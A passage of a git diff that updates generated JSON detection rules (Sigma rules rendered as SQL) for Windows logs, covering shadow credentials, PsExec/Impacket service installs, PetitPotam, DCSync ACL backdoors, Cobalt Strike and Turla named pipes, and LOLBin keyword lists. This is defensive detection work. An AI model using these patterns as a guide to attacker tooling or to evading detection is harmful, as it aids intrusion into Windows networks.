"author": "Tim Rauch (Nextron Systems)", + "description": "Detects possible addition of shadow credentials to an active directory object.", + "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.credential_access", + "attack.t1556" ], "falsepositives": [ - "Unknown" + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" ], - "filename": "file_change_win_unusual_modification_by_dns_exe.yml" + "filename": "win_security_susp_possible_shadow_credentials_added.yml" }, { - "title": "File Creation Date Changed to Another Year", - "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", + "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", + "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", "status": "experimental", - "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.t1070.006", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - 
"Changes made to or by the local NTP service" + "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" ], - "filename": "file_change_win_2022_timestomping.yml" + "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" }, { - "title": "Potential PrintNightmare Exploitation Attempt", - "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "title": "Possible PetitPotam Coerce Authentication Attempt", + "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", "status": "experimental", - "description": "Detect DLL deletions from Spooler Service driver folder. 
This might be a potential exploitation attempt of CVE-2021-1675", - "author": "Bhabesh Raj", + "description": "Detect PetitPotam coerced authentication activity.", + "author": "Mauricio Velazco, Michael Haag", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.credential_access", + "attack.t1187" ], "falsepositives": [ - "Unknown" + "Unknown. Feedback welcomed." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" ], - "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" + "filename": "win_security_petitpotam_network_share.yml" }, { - "title": "Unusual File Deletion by Dns.exe", - "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "title": "Suspicious Scheduled Task Update", + "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", "status": "experimental", - "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "description": "Detects update to a scheduled task event that contain suspicious keywords.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + 
"SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" + "filename": "win_security_susp_scheduled_task_update.yml" }, { - "title": "Prefetch File Deleted", - "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", - "status": "experimental", - "description": "Detects the deletion of a 
prefetch file which may indicate an attempt to destroy forensic evidence", - "author": "Cedric MAURUGEON", + "title": "Windows Defender Exclusion Set", + "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "status": "test", + "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", + "author": "@BarryShooshooga", "tags": [ "attack.defense_evasion", - "attack.t1070.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Intended inclusions by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_prefetch.yml" + "filename": "win_security_defender_bypass.yml" }, { - "title": "Exchange PowerShell Cmdlet History Deleted", - "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", + "id": "2c99737c-585d-4431-b61a-c911d86ff32f", "status": "experimental", - "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim 
Shelton; Maxence Fossat", + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "falsepositives": [ + "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + ], + "filename": "win_security_account_backdoor_dcsync_rights.yml" + }, + { + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", + "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Possible FP during log rotation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": 
"file_delete_win_delete_exchange_powershell_logs.yml" + "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" } ]
diff --git a/rules/rules_windows_generic_full.json b/rules/rules_windows_generic_full.json
index 73cdca9..e216723 100644
--- a/rules/rules_windows_generic_full.json
+++ b/rules/rules_windows_generic_full.json
@@ -1,710 +1,731 @@ [ { - "title": "DNS Query for MEGA.io Upload Domain - DNS Client", - "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "title": "Malicious Named Pipe", + "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe used by known APT malware", + "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' 
OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\')" ], - "filename": "win_dns_client_mega_nz.yml" + "filename": "pipe_created_mal_namedpipes.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", - "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "title": "CobaltStrike Named Pipe Pattern Regex", + "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP 
'\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,')" ], - "filename": "win_dns_client__mal_cobaltstrike.yml" + "filename": "pipe_created_mal_cobaltstrike_re.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - DNS Client", - "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", - "status": "experimental", - "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "ADFS Database Named Pipe Connection", + "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", + "status": "test", + "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Processes in the filter condition" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tssdis.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "win_dns_client_anonymfiles_com.yml" + "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - DNS Client", - "id": "090ffaad-c01a-4879-850c-6d57da98452d", - "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Named Pipes", + "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "status": "test", + "description": "Detects a named pipe used by Turla group samples", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.g0010", + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\')" ], - "filename": "win_dns_client_ufile_io.yml" + "filename": "pipe_created_apt_turla_namedpipes.yml" }, { - "title": "Query Tor Onion Address - DNS Client", - "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", + "title": "PowerShell Execution Via Named Pipe", + "id": 
"ac7102b4-9e1e-4802-9b4f-17c5524c015c", "status": "test", - "description": "Detects DNS resolution of an .onion address related to Tor routing networks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of PowerShell via creation of named pipe starting with PSHost", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE PipeName LIKE '\\\\PSHost%' ESCAPE '\\'" ], - "filename": "win_dns_client_tor_onion.yml" + "filename": "pipe_created_powershell_execution_pipe.yml" }, { - "title": "Protected Storage Service Access", - "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "title": "PAExec Default Named Pipe", + "id": "f6451de4-df0a-41fa-8d72-b39f54a08db5", "status": "test", - "description": "Detects access to a protected_storage service over the network. 
Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects PAExec default named pipe", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" + "SELECT * FROM logs WHERE PipeName LIKE '\\\\PAExec%' ESCAPE '\\'" ], - "filename": "win_security_protected_storage_service_access.yml" + "filename": "pipe_created_paexec_default_pipe.yml" }, { - "title": "Addition of SID History to Active Directory Object", - "id": "2632954e-db1c-49cb-9936-67d1ef1d17d2", - "status": "stable", - "description": "An attacker can use the SID history attribute to gain additional privileges.", - "author": "Thomas Patzke, @atc_project (improvements)", + "title": "CobaltStrike Named Pipe Patterns", + "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", + "status": "test", + "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", + "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1134.005" + "attack.t1055" ], "falsepositives": [ - "Migration of an account into a new domain" + "Chrome instances using the exact same pipe name \"mojo.something\"" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4765', '4766') OR ((EventID = '4738' AND NOT ((SidHistory LIKE '-' ESCAPE '\\' OR SidHistory LIKE '\\%\\%1793' ESCAPE '\\'))) AND NOT (SidHistory = ''))))" + "SELECT * FROM logs WHERE ((((PipeName LIKE 
'\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" ], - "filename": "win_security_susp_add_sid_history.yml" + "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" }, { - "title": "Suspicious Remote Logon with Explicit Credentials", - "id": "941e5c45-cda7-4864-8cea-bbb7458d194a", - "status": "experimental", - "description": "Detects suspicious processes logging on with explicit credentials", - "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", + "title": "CobaltStrike Named Pipe", 
+ "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", + "status": "test", + "description": "Detects the creation of a named pipe as used by CobaltStrike", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.t1078", - "attack.lateral_movement" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Administrators that use the RunAS command or scheduled tasks" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4648' AND (ProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\winrs.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')) AND NOT ((TargetServerName = 'localhost') OR (SubjectUserName LIKE '%$' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\')" ], - "filename": "win_security_susp_logon_explicit_credentials.yml" + "filename": "pipe_created_mal_cobaltstrike.yml" }, { - "title": "Account Tampering - Suspicious Failed Logon Reasons", - "id": "9eb99343-d336-4020-a3cd-67f3819e68ee", + "title": "PsExec Tool Execution From Suspicious Locations - PipeName", + "id": 
